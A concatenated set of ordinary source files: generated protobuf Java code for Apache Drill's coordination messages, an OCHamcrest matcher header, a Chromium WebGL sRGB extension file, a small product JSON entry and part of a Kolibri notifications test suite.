return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(org.apache.drill.exec.proto.CoordinationProtos.Roles prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE
? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
* Protobuf type {@code exec.Roles}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:exec.Roles)
org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.Roles.class, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder.class);
}
// Construct using org.apache.drill.exec.proto.CoordinationProtos.Roles.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3
.alwaysUseFieldBuilders) {
}
}
@java.lang.Override
public Builder clear() {
super.clear();
sqlQuery_ = true;
bitField0_ = (bitField0_ & ~0x00000001);
logicalPlan_ = true;
bitField0_ = (bitField0_ & ~0x00000002);
physicalPlan_ = true;
bitField0_ = (bitField0_ & ~0x00000004);
javaExecutor_ = true;
bitField0_ = (bitField0_ & ~0x00000008);
distributedCache_ = true;
bitField0_ = (bitField0_ & ~0x00000010);
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_descriptor;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.Roles getDefaultInstanceForType() {
return org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance();
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.Roles build() {
org.apache.drill.exec.proto.CoordinationProtos.Roles result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.Roles buildPartial() {
org.apache.drill.exec.proto.CoordinationProtos.Roles result = new org.apache.drill.exec.proto.CoordinationProtos.Roles(this);
int from_bitField0_ = bitField0_;
int to_bitField0_ = 0;
if (((from_bitField0_ & 0x00000001) != 0)) {
to_bitField0_ |= 0x00000001;
}
result.sqlQuery_ = sqlQuery_;
if (((from_bitField0_ & 0x00000002) != 0)) {
to_bitField0_ |= 0x00000002;
}
result.logicalPlan_ = logicalPlan_;
if (((from_bitField0_ & 0x00000004) != 0)) {
to_bitField0_ |= 0x00000004;
}
result.physicalPlan_ = physicalPlan_;
if (((from_bitField0_ & 0x00000008) != 0)) {
to_bitField0_ |= 0x00000008;
}
result.javaExecutor_ = javaExecutor_;
if (((from_bitField0_ & 0x00000010) != 0)) {
to_bitField0_ |= 0x00000010;
}
result.distributedCache_ = distributedCache_;
result.bitField0_ = to_bitField0_;
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(
com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(
com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof org.apache.drill.exec.proto.CoordinationProtos.Roles) {
return mergeFrom((org.apache.drill.exec.proto.CoordinationProtos.Roles)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(org.apache.drill.exec.proto.CoordinationProtos.Roles other) {
if (other == org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance()) return this;
if (other.hasSqlQuery()) {
setSqlQuery(other.getSqlQuery());
}
if (other.hasLogicalPlan()) {
setLogicalPlan(other.getLogicalPlan());
}
if (other.hasPhysicalPlan()) {
setPhysicalPlan(other.getPhysicalPlan());
}
if (other.hasJavaExecutor()) {
setJavaExecutor(other.getJavaExecutor());
}
if (other.hasDistributedCache()) {
setDistributedCache(other.getDistributedCache());
}
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
org.apache.drill.exec.proto.CoordinationProtos.Roles parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (org.apache.drill.exec.proto.CoordinationProtos.Roles) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
private int bitField0_;
private boolean sqlQuery_ = true;
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return Whether the sqlQuery field is set.
*/
public boolean hasSqlQuery() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return The sqlQuery.
*/
public boolean getSqlQuery() {
return sqlQuery_;
}
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @param value The sqlQuery to set.
* @return This builder for chaining.
*/
public Builder setSqlQuery(boolean value) {
bitField0_ |= 0x00000001;
sqlQuery_ = value;
onChanged();
return this;
}
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearSqlQuery() {
bitField0_ = (bitField0_ & ~0x00000001);
sqlQuery_ = true;
onChanged();
return this;
}
private boolean logicalPlan_ = true;
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return Whether the logicalPlan field is set.
*/
public boolean hasLogicalPlan() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return The logicalPlan.
*/
public boolean getLogicalPlan() {
return logicalPlan_;
}
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @param value The logicalPlan to set.
* @return This builder for chaining.
*/
public Builder setLogicalPlan(boolean value) {
bitField0_ |= 0x00000002;
logicalPlan_ = value;
onChanged();
return this;
}
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearLogicalPlan() {
bitField0_ = (bitField0_ & ~0x00000002);
logicalPlan_ = true;
onChanged();
return this;
}
private boolean physicalPlan_ = true;
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return Whether the physicalPlan field is set.
*/
public boolean hasPhysicalPlan() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return The physicalPlan.
*/
public boolean getPhysicalPlan() {
return physicalPlan_;
}
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @param value The physicalPlan to set.
* @return This builder for chaining.
*/
public Builder setPhysicalPlan(boolean value) {
bitField0_ |= 0x00000004;
physicalPlan_ = value;
onChanged();
return this;
}
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearPhysicalPlan() {
bitField0_ = (bitField0_ & ~0x00000004);
physicalPlan_ = true;
onChanged();
return this;
}
private boolean javaExecutor_ = true;
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return Whether the javaExecutor field is set.
*/
public boolean hasJavaExecutor() {
return ((bitField0_ & 0x00000008) != 0);
}
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return The javaExecutor.
*/
public boolean getJavaExecutor() {
return javaExecutor_;
}
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @param value The javaExecutor to set.
* @return This builder for chaining.
*/
public Builder setJavaExecutor(boolean value) {
bitField0_ |= 0x00000008;
javaExecutor_ = value;
onChanged();
return this;
}
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearJavaExecutor() {
bitField0_ = (bitField0_ & ~0x00000008);
javaExecutor_ = true;
onChanged();
return this;
}
private boolean distributedCache_ = true;
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return Whether the distributedCache field is set.
*/
public boolean hasDistributedCache() {
return ((bitField0_ & 0x00000010) != 0);
}
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return The distributedCache.
*/
public boolean getDistributedCache() {
return distributedCache_;
}
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @param value The distributedCache to set.
* @return This builder for chaining.
*/
public Builder setDistributedCache(boolean value) {
bitField0_ |= 0x00000010;
distributedCache_ = value;
onChanged();
return this;
}
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearDistributedCache() {
bitField0_ = (bitField0_ & ~0x00000010);
distributedCache_ = true;
onChanged();
return this;
}
@java.lang.Override
public final Builder setUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:exec.Roles)
}
// @@protoc_insertion_point(class_scope:exec.Roles)
private static final org.apache.drill.exec.proto.CoordinationProtos.Roles DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new org.apache.drill.exec.proto.CoordinationProtos.Roles();
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles getDefaultInstance() {
return DEFAULT_INSTANCE;
}
@java.lang.Deprecated public static final com.google.protobuf.Parser<Roles>
PARSER = new com.google.protobuf.AbstractParser<Roles>() {
@java.lang.Override
public Roles parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new Roles(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<Roles> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<Roles> getParserForType() {
return PARSER;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.Roles getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_exec_DrillbitEndpoint_descriptor;
private static final
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internal_static_exec_DrillbitEndpoint_fieldAccessorTable;
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_exec_DrillServiceInstance_descriptor;
private static final
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internal_static_exec_DrillServiceInstance_fieldAccessorTable;
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_exec_Roles_descriptor;
private static final
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internal_static_exec_Roles_fieldAccessorTable;
public static com.google.protobuf.Descriptors.FileDescriptor
getDescriptor() {
return descriptor;
}
private static com.google.protobuf.Descriptors.FileDescriptor
descriptor;
static {
java.lang.String[] descriptorData = {
"\n\022Coordination.proto\022\004exec\"\212\002\n\020DrillbitE" +
"ndpoint\022\017\n\007address\030\001 \001(\t\022\021\n\tuser_port\030\002 " +
"\001(\005\022\024\n\014control_port\030\003 \001(\005\022\021\n\tdata_port\030\004" +
" \001(\005\022\032\n\005roles\030\005 \001(\0132\013.exec.Roles\022\017\n\007vers" +
"ion\030\006 \001(\t\022+\n\005state\030\007 \001(\0162\034.exec.Drillbit" +
"Endpoint.State\022\021\n\thttp_port\030\010 \001(\005\"<\n\005Sta" +
"te\022\013\n\007STARTUP\020\000\022\n\n\006ONLINE\020\001\022\r\n\tQUIESCENT" +
"\020\002\022\013\n\007OFFLINE\020\003\"i\n\024DrillServiceInstance\022" +
"\n\n\002id\030\001 \001(\t\022\033\n\023registrationTimeUTC\030\002 \001(\003" +
"\022(\n\010endpoint\030\003 \001(\0132\026.exec.DrillbitEndpoi" +
"nt\"\227\001\n\005Roles\022\027\n\tsql_query\030\001 \001(\010:\004true\022\032\n" +
"\014logical_plan\030\002 \001(\010:\004true\022\033\n\rphysical_pl" +
"an\030\003 \001(\010:\004true\022\033\n\rjava_executor\030\004 \001(\010:\004t" +
"rue\022\037\n\021distributed_cache\030\005 \001(\010:\004trueB3\n\033" +
"org.apache.drill.exec.protoB\022Coordinatio" +
"nProtosH\001"
};
descriptor = com.google.protobuf.Descriptors.FileDescriptor
.internalBuildGeneratedFileFrom(descriptorData,
new com.google.protobuf.Descriptors.FileDescriptor[] {
});
internal_static_exec_DrillbitEndpoint_descriptor =
getDescriptor().getMessageTypes().get(0);
internal_static_exec_DrillbitEndpoint_fieldAccessorTable = new
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable(
internal_static_exec_DrillbitEndpoint_descriptor,
new java.lang.String[] { "Address", "UserPort", "ControlPort", "DataPort", "Roles", "Version", "State", "HttpPort", });
internal_static_exec_DrillServiceInstance_descriptor =
getDescriptor().getMessageTypes().get(1);
internal_static_exec_DrillServiceInstance_fieldAccessorTable = new
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable(
internal_static_exec_DrillServiceInstance_descriptor,
new java.lang.String[] { "Id", "RegistrationTimeUTC", "Endpoint", });
internal_static_exec_Roles_descriptor =
getDescriptor().getMessageTypes().get(2);
internal_static_exec_Roles_fieldAccessorTable = new
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable(
internal_static_exec_Roles_descriptor,
new java.lang.String[] { "SqlQuery", "LogicalPlan", "PhysicalPlan", "JavaExecutor", "DistributedCache", });
}
// @@protoc_insertion_point(outer_class_scope)
}
| 53,769 |
3,970 |
// OCHamcrest by <NAME>, http://qualitycoding.org/about/
// Copyright 2014 hamcrest.org. See LICENSE.txt
#import <OCHamcrest/HCDiagnosingMatcher.h>
@interface HCAllOf : HCDiagnosingMatcher
+ (instancetype)allOf:(NSArray *)matchers;
- (instancetype)initWithMatchers:(NSArray *)matchers;
@end
FOUNDATION_EXPORT id HC_allOf(id match, ...) NS_REQUIRES_NIL_TERMINATION;
/**
allOf(firstMatcher, ...) -
Matches if all of the given matchers evaluate to @c YES.
@param firstMatcher,... A comma-separated list of matchers ending with @c nil.
The matchers are evaluated from left to right using short-circuit evaluation, so evaluation
stops as soon as a matcher returns @c NO.
Any argument that is not a matcher is implicitly wrapped in an @ref equalTo matcher to check for
equality.
(In the event of a name clash, don't \#define @c HC_SHORTHAND and use the synonym
@c HC_allOf instead.)
@ingroup logical_matchers
*/
#ifdef HC_SHORTHAND
#define allOf HC_allOf
#endif
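// Usage sketch: a minimal, illustrative example of combining matchers with
// allOf inside a test. It assumes HC_SHORTHAND is defined and the umbrella
// header <OCHamcrest/OCHamcrest.h> is imported; the matcher list must end
// with nil because of NS_REQUIRES_NIL_TERMINATION.
//
//   assertThat(@"myValue",
//              allOf(startsWith(@"my"), endsWith(@"Value"), notNilValue(), nil));
//
// Evaluation short-circuits, so if startsWith() fails, endsWith() and
// notNilValue() are never consulted; a plain object argument such as
// @"myValue" would be implicitly wrapped in equalTo().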
| 331 |
2,151 |
<gh_stars>1000+
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "third_party/blink/renderer/modules/webgl/ext_srgb.h"
#include "third_party/blink/renderer/modules/webgl/webgl_rendering_context_base.h"
namespace blink {
EXTsRGB::EXTsRGB(WebGLRenderingContextBase* context) : WebGLExtension(context) {
context->ExtensionsUtil()->EnsureExtensionEnabled("GL_EXT_sRGB");
}
WebGLExtensionName EXTsRGB::GetName() const {
return kEXTsRGBName;
}
EXTsRGB* EXTsRGB::Create(WebGLRenderingContextBase* context) {
return new EXTsRGB(context);
}
bool EXTsRGB::Supported(WebGLRenderingContextBase* context) {
Extensions3DUtil* extensions_util = context->ExtensionsUtil();
return extensions_util->SupportsExtension("GL_EXT_sRGB");
}
const char* EXTsRGB::ExtensionName() {
return "EXT_sRGB";
}
} // namespace blink
| 324 |
310 |
<filename>gear/hardware/m/ms-25-plus.json
{
"name": "MS 25 Plus",
"description": "A typewriter.",
"url": "https://www.amazon.com/Olivetti-MS-25-Plus-Typewriter/dp/B00093IW12/"
}
| 78 |
545 |
<gh_stars>100-1000
import json
import uuid
from datetime import timedelta
from le_utils.constants import content_kinds
from mock import patch
from rest_framework.test import APITestCase
from kolibri.core.auth.test.helpers import create_superuser
from kolibri.core.auth.test.helpers import provision_device
from kolibri.core.auth.test.test_api import ClassroomFactory
from kolibri.core.auth.test.test_api import FacilityFactory
from kolibri.core.content.models import ContentNode
from kolibri.core.exams.models import Exam
from kolibri.core.exams.models import ExamAssignment
from kolibri.core.lessons.models import Lesson
from kolibri.core.lessons.models import LessonAssignment
from kolibri.core.logger.models import AttemptLog
from kolibri.core.logger.models import ExamAttemptLog
from kolibri.core.logger.models import ExamLog
from kolibri.core.logger.models import MasteryLog
from kolibri.core.logger.test.factory_logger import ContentSessionLogFactory
from kolibri.core.logger.test.factory_logger import ContentSummaryLogFactory
from kolibri.core.logger.test.factory_logger import FacilityUserFactory
from kolibri.core.logger.utils.exam_log_migration import migrate_from_exam_logs
from kolibri.core.notifications.api import _get_lesson_dict
from kolibri.core.notifications.api import batch_process_attemptlogs
from kolibri.core.notifications.api import batch_process_examlogs
from kolibri.core.notifications.api import batch_process_masterylogs_for_quizzes
from kolibri.core.notifications.api import batch_process_summarylogs
from kolibri.core.notifications.api import create_examlog
from kolibri.core.notifications.api import create_notification
from kolibri.core.notifications.api import create_summarylog
from kolibri.core.notifications.api import finish_lesson_resource
from kolibri.core.notifications.api import get_assignments
from kolibri.core.notifications.api import parse_attemptslog
from kolibri.core.notifications.api import parse_examlog
from kolibri.core.notifications.api import parse_summarylog
from kolibri.core.notifications.api import quiz_completed_notification
from kolibri.core.notifications.api import quiz_started_notification
from kolibri.core.notifications.api import start_lesson_assessment
from kolibri.core.notifications.api import start_lesson_resource
from kolibri.core.notifications.api import update_lesson_assessment
from kolibri.core.notifications.models import HelpReason
from kolibri.core.notifications.models import LearnerProgressNotification
from kolibri.core.notifications.models import NotificationEventType
from kolibri.core.notifications.models import NotificationObjectType
from kolibri.utils.time_utils import local_now
class NotificationsAPITestCase(APITestCase):
@classmethod
def setUpTestData(cls):
provision_device()
cls.facility = FacilityFactory.create()
cls.superuser = create_superuser(cls.facility)
def setUp(self):
_get_lesson_dict.cache_clear()
self.user1 = FacilityUserFactory.create(facility=self.facility)
self.user2 = FacilityUserFactory.create(facility=self.facility)
# create classroom, learner group, add user1
self.classroom = ClassroomFactory.create(parent=self.facility)
self.classroom.add_member(self.user1)
self.channel_id = "15f32edcec565396a1840c5413c92450"
self.lesson_id = "15f32edcec565396a1840c5413c92452"
self.content_ids = [
"15f32edcec565396a1840c5413c92451",
"15f32edcec565396a1840c5413c92452",
"15f32edcec565396a1840c5413c92453",
]
self.contentnode_ids = [
"25f32edcec565396a1840c5413c92451",
"25f32edcec565396a1840c5413c92452",
"25f32edcec565396a1840c5413c92453",
]
self.node_1 = ContentNode.objects.create(
title="Node 1",
available=True,
id=self.contentnode_ids[0],
content_id=self.content_ids[0],
channel_id=self.channel_id,
kind=content_kinds.EXERCISE,
)
self.node_2 = ContentNode.objects.create(
title="Node 2",
available=True,
id=self.contentnode_ids[1],
content_id=self.content_ids[1],
channel_id=self.channel_id,
kind=content_kinds.EXERCISE,
)
self.lesson = Lesson.objects.create(
id=self.lesson_id,
title="My Lesson",
is_active=True,
created_by=self.superuser,
collection=self.classroom,
resources=json.dumps(
[
{
"contentnode_id": self.node_1.id,
"content_id": self.node_1.content_id,
"channel_id": self.channel_id,
},
{
"contentnode_id": self.node_2.id,
"content_id": self.node_2.content_id,
"channel_id": self.channel_id,
},
]
),
)
self.assignment_1 = LessonAssignment.objects.create(
lesson=self.lesson, assigned_by=self.superuser, collection=self.classroom
)
self.exam = Exam.objects.create(
title="title",
question_count=1,
active=True,
collection=self.classroom,
creator=self.superuser,
)
self.assignment = ExamAssignment.objects.create(
exam=self.exam, collection=self.classroom, assigned_by=self.superuser
)
self.summarylog1 = ContentSummaryLogFactory.create(
user=self.user1,
content_id=self.node_1.content_id,
channel_id=self.channel_id,
)
self.summarylog2 = ContentSummaryLogFactory.create(
user=self.user1,
content_id=self.node_2.content_id,
channel_id=self.channel_id,
kind=content_kinds.EXERCISE,
)
def test_get_assignments(self):
# user2 has no classroom assigned, thus no lessons:
summarylog = ContentSummaryLogFactory.create(
user=self.user2,
content_id=self.node_1.content_id,
channel_id=self.channel_id,
)
lessons = get_assignments(self.user2, summarylog, attempt=False)
assert lessons == []
# user1 has one lesson:
lessons = get_assignments(self.user1, self.summarylog1, attempt=False)
assert len(lessons) > 0
assert type(lessons[0][0]) == dict
assert "assignment_collections" in lessons[0][0]
# being the node an Exercise, it should be available for attempts:
lessons = get_assignments(self.user1, self.summarylog1, attempt=True)
assert len(lessons) > 0
def test_create_notification(self):
notification = create_notification(
NotificationObjectType.Quiz,
NotificationEventType.Completed,
self.user1.id,
self.classroom.id,
)
assert str(notification) == "Quiz - Completed"
assert notification.user_id == self.user1.id
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_summarylog(self, save_notifications):
parse_summarylog(self.summarylog1)
assert save_notifications.called is False
self.summarylog1.progress = 1.0
parse_summarylog(self.summarylog1)
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Resource
assert notification.notification_event == NotificationEventType.Completed
assert notification.lesson_id == self.lesson.id
assert notification.contentnode_id == self.node_1.id
@patch("kolibri.core.notifications.api.save_notifications")
def test_finish_lesson_resource(self, save_notifications):
finish_lesson_resource(self.summarylog1, self.node_1.id, self.lesson.id)
assert save_notifications.called is False
self.summarylog1.progress = 1.0
self.summarylog1.save()
finish_lesson_resource(self.summarylog1, self.node_1.id, self.lesson.id)
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Resource
assert notification.notification_event == NotificationEventType.Completed
assert notification.lesson_id == self.lesson.id
assert notification.contentnode_id == self.node_1.id
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_summarylog_exercise(self, save_notifications):
parse_summarylog(self.summarylog2)
assert save_notifications.called is False
@patch("kolibri.core.notifications.api.save_notifications")
def test_create_summarylog(self, save_notifications):
create_summarylog(self.summarylog1)
assert save_notifications.called is True
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Resource
assert notification.notification_event == NotificationEventType.Started
@patch("kolibri.core.notifications.api.save_notifications")
def test_start_lesson_resource(self, save_notifications):
start_lesson_resource(self.summarylog1, self.node_1.id, self.lesson.id)
assert save_notifications.called is True
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Resource
assert notification.notification_event == NotificationEventType.Started
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_examlog(self, save_notifications):
examlog = ExamLog.objects.create(exam=self.exam, user=self.user1)
parse_examlog(examlog, local_now())
assert save_notifications.called is False
examlog.closed = True
parse_examlog(examlog, local_now())
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Quiz
assert notification.notification_event == NotificationEventType.Completed
@patch("kolibri.core.notifications.api.save_notifications")
def test_quiz_completed_notification(self, save_notifications):
summarylog_quiz = ContentSummaryLogFactory.create(
user=self.user1,
content_id=self.exam.id,
channel_id=None,
kind=content_kinds.QUIZ,
)
sessionlog_quiz = ContentSessionLogFactory.create(
user=self.user1,
content_id=self.exam.id,
channel_id=None,
kind=content_kinds.QUIZ,
)
masterylog_quiz = MasteryLog.objects.create(
summarylog=summarylog_quiz,
start_timestamp=local_now(),
user=self.user1,
mastery_level=-1,
)
AttemptLog.objects.create(
masterylog=masterylog_quiz,
sessionlog=sessionlog_quiz,
item="test",
start_timestamp=local_now(),
end_timestamp=local_now(),
user=self.user1,
correct=0,
)
quiz_completed_notification(masterylog_quiz, self.exam.id)
assert save_notifications.called is False
masterylog_quiz.complete = True
masterylog_quiz.save()
quiz_completed_notification(masterylog_quiz, self.exam.id)
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Quiz
assert notification.notification_event == NotificationEventType.Completed
assert notification.quiz_num_answered == 1
assert notification.quiz_num_correct == 0
@patch("kolibri.core.notifications.api.save_notifications")
def test_quiz_started_notification(self, save_notifications):
summarylog_quiz = ContentSummaryLogFactory.create(
user=self.user1,
content_id=self.exam.id,
channel_id=None,
kind=content_kinds.QUIZ,
)
ContentSessionLogFactory.create(
user=self.user1,
content_id=self.exam.id,
channel_id=None,
kind=content_kinds.QUIZ,
)
masterylog_quiz = MasteryLog.objects.create(
summarylog=summarylog_quiz,
start_timestamp=local_now(),
user=self.user1,
mastery_level=-1,
complete=True,
)
quiz_started_notification(masterylog_quiz, self.exam.id)
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Quiz
assert notification.notification_event == NotificationEventType.Started
@patch("kolibri.core.notifications.api.save_notifications")
def test_create_examlog(self, save_notifications):
examlog = ExamLog.objects.create(exam=self.exam, user=self.user1)
create_examlog(examlog, local_now())
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Quiz
assert notification.notification_event == NotificationEventType.Started
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_start_lesson_assessment_with_no_notification(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
start_lesson_assessment(attemptlog1, self.node_1.id, self.lesson_id)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog1.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Lesson,
NotificationEventType.Started,
attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
timestamp=attemptlog1.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_create_on_new_attempt_with_no_notification(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
parse_attemptslog(attemptlog1)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog1.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Lesson,
NotificationEventType.Started,
attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
timestamp=attemptlog1.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_start_lesson_assessment_with_notification(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
